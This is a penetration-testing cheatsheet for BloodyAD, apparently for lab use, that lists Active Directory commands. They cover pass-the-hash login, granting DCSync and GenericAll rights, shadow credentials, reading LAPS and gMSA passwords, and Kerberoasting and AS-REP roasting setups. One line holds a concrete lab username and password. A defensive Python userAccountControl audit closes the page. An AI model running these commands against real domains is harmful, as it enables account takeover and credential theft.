BloodyAD
BloodyAD Cheatsheet
Installation
Using uv
uv tool install bloodyAD
Using pipx
pipx install bloodyAD
Using pip
pip install bloodyAD
Authentication Methods
Password Authentication
bloodyAD --host $dc -d $domain -u $username -p $password [command]
Hash Authentication (Pass-the-Hash)
bloodyAD --host $dc -d $domain -u $username -p :$ntlm_hash [command]
Kerberos Authentication
bloodyAD --host $dc -d $domain -u $username -p $password -k [command]
Certificate Authentication
bloodyAD --host $dc -d $domain -c $cert.pfx -p $cert_password [command]
Enumeration Commands
Retrieve User Information
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username
Get Specific Attributes
bloodyAD --host $dc -d $domain -u $username -p $password get object $target --attr memberOf,servicePrincipalName,userAccountControl
Check a User's MachineAccountQuota Usage (computer accounts created, via ms-ds-creatorsid)
bloodyAD -d inlanefreight.local --host 10.129.229.224 -u aneudy -p Ilovemusic01 get search --filter '(objectClass=computer)' --attr ms-ds-creatorsid
Find Writable Attributes
bloodyAD --host $dc -d $domain -u $username -p $password get writable --detail
Search for Specific Objects
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(objectClass=computer)"
List All Domain Users
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(objectClass=user)"
List All Groups
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(objectClass=group)"
Find Privileged Groups
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(&(objectClass=group)(adminCount=1))"
Get Domain Controllers
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))"
User and Group Management
Add User To Group
bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add
Remove User From Group
bloodyAD --host $dc -d $domain -u $username -p $password remove groupMember $group_name $member_to_remove
Change Password
bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password
Force Password Change at Next Logon
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_username pwdLastSet -v 0
Set Password Never Expires
bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f DONT_EXPIRE_PASSWD
ACL Manipulation
Give User GenericAll Rights
bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $target_DN $user_to_grant
Add GenericWrite Permission
bloodyAD --host $dc -d $domain -u $username -p $password add genericWrite $target_DN $user_to_grant
WriteOwner
bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_object $new_owner
WriteDACL
bloodyAD --host $dc -d $domain -u $username -p $password add writeDacl $target_DN $user_to_grant
Add DCSync Rights
bloodyAD --host $dc -d $domain -u $username -p $password add dcsync $user_to_grant
GMSA (Group Managed Service Account)
ReadGMSAPassword
bloodyAD --host $dc -d $domain -u $username -p $password get object $gmsa_account --attr msDS-ManagedPassword
Decode GMSA Password
bloodyAD --host $dc -d $domain -u $username -p $password get object $gmsa_account --attr msDS-ManagedPassword --raw
UAC (User Account Control) Flags
Enable a Disabled Account
bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE
Disable an Account
bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f ACCOUNTDISABLE
Add TRUSTED_TO_AUTH_FOR_DELEGATION Flag
bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION
Remove TRUSTED_TO_AUTH_FOR_DELEGATION Flag
bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION
Set Account as Sensitive (Cannot be Delegated)
bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f NOT_DELEGATED
Kerberos Delegation
Add Resource Based Constrained Delegation (RBCD)
bloodyAD --host $dc -d $domain -u $username -p $password add rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$'
Remove RBCD
bloodyAD --host $dc -d $domain -u $username -p $password remove rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$'
Get RBCD Configuration
bloodyAD --host $dc -d $domain -u $username -p $password get rbcd 'TARGET$'
Set Constrained Delegation
bloodyAD --host $dc -d $domain -u $username -p $password set object $account msDS-AllowedToDelegateTo -v "HOST/target.domain.local"
SPN (Service Principal Name) Management
WriteSPN
bloodyAD --host $dc -d $domain -u $username -p $password set object $target servicePrincipalName -v 'HTTP/server.domain.local'
Add SPN
bloodyAD --host $dc -d $domain -u $username -p $password add servicePrincipalName $target 'MSSQLSvc/server.domain.local:1433'
Remove SPN
bloodyAD --host $dc -d $domain -u $username -p $password remove servicePrincipalName $target 'MSSQLSvc/server.domain.local:1433'
Shadow Credentials
Add Shadow Credentials
bloodyAD --host $dc -d $domain -u $username -p $password add shadowCredentials $target
Clear Shadow Credentials
bloodyAD --host $dc -d $domain -u $username -p $password clear shadowCredentials $target
Add Shadow Credentials with Custom Certificate
bloodyAD --host $dc -d $domain -u $username -p $password add shadowCredentials $target --cert cert.pfx
Computer Account Management
Create New Computer Account
bloodyAD --host $dc -d $domain -u $username -p $password add computer $computer_name $computer_password
Delete Computer Account
bloodyAD --host $dc -d $domain -u $username -p $password remove computer $computer_name
MachineAccountQuota - Enumerate
bloodyAD --host $dc -d $domain -u $username -p $password get object 'DC=domain,DC=local' --attr ms-DS-MachineAccountQuota
MachineAccountQuota - Set Value
bloodyAD --host $dc -d $domain -u $username -p $password set object 'DC=domain,DC=local' ms-DS-MachineAccountQuota -v 10
Attribute Modification
Modify UPN (User Principal Name)
bloodyAD --host $dc -d $domain -u $username -p $password set object $target userPrincipalName -v $new_upn
Modify Mail Attribute
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user mail -v newmail@domain.local
Modify altSecurityIdentities (ESC14B)
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user altSecurityIdentities -v 'X509:<RFC822>user@domain.local'
Modify Description
bloodyAD --host $dc -d $domain -u $username -p $password set object $target description -v "New description"
Modify Display Name
bloodyAD --host $dc -d $domain -u $username -p $password set object $target displayName -v "New Display Name"
Deleted Objects and Recovery
Find Deleted Objects
bloodyAD --host $dc -d $domain -u $username -p $password get writable --include-del
Search Tombstoned Objects
bloodyAD --host $dc -d $domain -u $username -p $password get search -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065
Restore Deleted Object
bloodyAD --host $dc -d $domain -u $username -p $password set restore $deleted_object_DN
Trust Management
Get Trust Information
bloodyAD --host $dc -d $domain -u $username -p $password get object "CN=domain.local,CN=System,DC=domain,DC=local" --attr trustDirection,trustType,trustAttributes
Enumerate Foreign Security Principals
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(objectClass=foreignSecurityPrincipal)"
LAPS (Local Administrator Password Solution)
Read LAPS Password
bloodyAD --host $dc -d $domain -u $username -p $password get object $computer_name --attr ms-Mcs-AdmPwd
Read LAPS Expiration Time
bloodyAD --host $dc -d $domain -u $username -p $password get object $computer_name --attr ms-Mcs-AdmPwdExpirationTime
Certificate Services (ADCS)
Enumerate Certificate Templates
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(objectClass=pKICertificateTemplate)"
Get Certificate Template Permissions
bloodyAD --host $dc -d $domain -u $username -p $password get object "CN=TemplateName,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" --attr nTSecurityDescriptor
Advanced Search Operations
Extended Search with Controls
bloodyAD --host $dc -d $domain -u $username -p $password get search -h
Search with Custom LDAP Filter
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(&(objectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=local))"
Search with Size Limit
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(objectClass=*)" --size-limit 100
Useful Combinations and Scenarios
Kerberoasting Setup (Add SPN to User)
bloodyAD --host $dc -d $domain -u $username -p $password add servicePrincipalName $target_user "MSSQLSvc/fake.domain.local"
ASREPRoasting Setup (Disable Pre-Authentication)
bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_user -f DONT_REQ_PREAUTH
Unconstrained Delegation Setup
bloodyAD --host $dc -d $domain -u $username -p $password add uac $computer_account -f TRUSTED_FOR_DELEGATION
DNS Admin Abuse
bloodyAD --host $dc -d $domain -u $username -p $password add groupMember "DnsAdmins" $username
Protocol Transition: Constrained Delegation
# Set the TRUSTED_TO_AUTH_FOR_DELEGATION flag
bloodyAD --host $dc -d $domain -u $username -p $password add uac $service_account -f TRUSTED_TO_AUTH_FOR_DELEGATION
# Set the services the account can delegate to (constrained delegation)
bloodyAD --host $dc -d $domain -u $username -p $password set object $service_account msDS-AllowedToDelegateTo -v "CIFS/target.domain.local"
Important Notes
- Authentication Options:
  - Pass -k to use Kerberos authentication
  - Use -p :hash for pass-the-hash (NTLM hash only)
  - Specify the hash format using -f, e.g., -f rc4 or -f aes256
- Common Variables:
  - $dc = Domain Controller IP or hostname
  - $domain = Domain name (e.g., domain.local)
  - $username = Your username
  - $password = Your password
  - $target = Target object (user, computer, group)
  - $DN = Distinguished Name (e.g., CN=User,CN=Users,DC=domain,DC=local)
- Output Formats:
  - Add --json for JSON output
  - Add --raw for raw attribute values
  - Add --detail for detailed information
- Useful Flags:
  - --help - Show help for specific commands
  - --debug - Enable debug output
  - --no-pass - Don't ask for a password (useful for Kerberos)
  - --dc-ip - Specify the DC IP directly
- Common UAC Flags:
  - ACCOUNTDISABLE - Account is disabled
  - DONT_EXPIRE_PASSWD - Password never expires
  - DONT_REQ_PREAUTH - Don't require Kerberos pre-authentication
  - TRUSTED_FOR_DELEGATION - Unconstrained delegation
  - TRUSTED_TO_AUTH_FOR_DELEGATION - Protocol transition
  - NOT_DELEGATED - Account is sensitive, cannot be delegated
  - PASSWORD_EXPIRED - Password has expired
- LDAP Search Controls:
  - 1.2.840.113556.1.4.2064 - Show deleted objects
  - 1.2.840.113556.1.4.2065 - Show recycled objects
  - 1.2.840.113556.1.4.801 - Show deactivated link
  - 1.2.840.113556.1.4.417 - Show extended DN
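The UAC flag names used throughout this cheatsheet (the `add uac` / `remove uac` commands, the "Common UAC Flags" notes, and the `userAccountControl:1.2.840.113556.1.4.803:=8192` filter in the domain controller search) are all bits of one integer attribute. The following Python is an added example, not code from bloodyAD or this cheatsheet's author: it decodes a userAccountControl value into flag names, builds the same bitwise LDAP filter for any combination of flags, and runs a small audit that reports accounts carrying flags a defender should review. The flag values are the documented Active Directory constants; the account records are constructed sample data, and the audit's exemption of domain controllers from the unconstrained-delegation finding is this example's own design choice.

```python
"""Decode userAccountControl bitmasks, build bitwise LDAP filters, and audit
accounts for weak Kerberos/password settings. Added example for this
cheatsheet; not part of bloodyAD."""

# userAccountControl bit values (documented AD constants, MS-ADTS / MS-SAMR).
UAC_FLAGS = {
    "SCRIPT": 0x0001,
    "ACCOUNTDISABLE": 0x0002,
    "HOMEDIR_REQUIRED": 0x0008,
    "LOCKOUT": 0x0010,
    "PASSWD_NOTREQD": 0x0020,
    "PASSWD_CANT_CHANGE": 0x0040,
    "ENCRYPTED_TEXT_PWD_ALLOWED": 0x0080,
    "TEMP_DUPLICATE_ACCOUNT": 0x0100,
    "NORMAL_ACCOUNT": 0x0200,
    "INTERDOMAIN_TRUST_ACCOUNT": 0x0800,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,          # 8192: domain controllers
    "DONT_EXPIRE_PASSWD": 0x10000,
    "MNS_LOGON_ACCOUNT": 0x20000,
    "SMARTCARD_REQUIRED": 0x40000,
    "TRUSTED_FOR_DELEGATION": 0x80000,       # unconstrained delegation
    "NOT_DELEGATED": 0x100000,
    "USE_DES_KEY_ONLY": 0x200000,
    "DONT_REQ_PREAUTH": 0x400000,            # AS-REP roastable
    "PASSWORD_EXPIRED": 0x800000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,  # protocol transition
    "PARTIAL_SECRETS_ACCOUNT": 0x4000000,
}

# Flags worth reviewing: each weakens the account's Kerberos or password posture.
RISKY_FLAGS = {
    "DONT_REQ_PREAUTH",
    "TRUSTED_FOR_DELEGATION",
    "TRUSTED_TO_AUTH_FOR_DELEGATION",
    "PASSWD_NOTREQD",
    "USE_DES_KEY_ONLY",
}

# LDAP_MATCHING_RULE_BIT_AND: the OID used in the cheatsheet's DC search filter.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(value):
    """Return the names of all flags set in a userAccountControl integer, lowest bit first."""
    return [name for name, bit in sorted(UAC_FLAGS.items(), key=lambda kv: kv[1])
            if value & bit]


def uac_filter(*flag_names, object_class="user"):
    """Build an LDAP filter matching objects that have ALL of the given UAC flags set.

    uac_filter("SERVER_TRUST_ACCOUNT", object_class="computer") reproduces the
    cheatsheet's domain controller search (mask 8192).
    """
    mask = 0
    for name in flag_names:
        mask |= UAC_FLAGS[name]
    return f"(&(objectClass={object_class})(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={mask}))"


def audit(records):
    """Report accounts with risky UAC flags.

    records: iterable of (sAMAccountName, userAccountControl) pairs, e.g. parsed
    from an LDAP export. Returns a list of (name, sorted risky flag names).
    Domain controllers (SERVER_TRUST_ACCOUNT) are trusted for delegation by
    design, so that single flag is not reported for them (design choice here).
    """
    findings = []
    for name, uac in records:
        flags = set(decode_uac(uac))
        risky = flags & RISKY_FLAGS
        if "SERVER_TRUST_ACCOUNT" in flags:
            risky.discard("TRUSTED_FOR_DELEGATION")
        if risky:
            findings.append((name, sorted(risky)))
    return findings


# Constructed sample records (not from any real directory).
SAMPLE_RECORDS = [
    ("svc_sql", 0x200 | 0x10000 | 0x400000),   # user, pwd never expires, no preauth
    ("dc01$", 0x2000 | 0x80000),               # DC: unconstrained delegation is expected
    ("alice", 0x200),                          # plain user account
    ("web01$", 0x1000 | 0x1000000),            # workstation with protocol transition
]

if __name__ == "__main__":
    for name, uac in SAMPLE_RECORDS:
        print(f"{name}: {uac} -> {', '.join(decode_uac(uac))}")
    print(uac_filter("DONT_REQ_PREAUTH"))
    for name, flags in audit(SAMPLE_RECORDS):
        print(f"REVIEW {name}: {', '.join(flags)}")
```

Feeding real records into `audit` is a matter of exporting `sAMAccountName` and `userAccountControl` for the objects returned by a search such as the "List All Domain Users" command above; the filters produced by `uac_filter` can narrow that search to accounts with a given flag server-side instead of decoding every object locally.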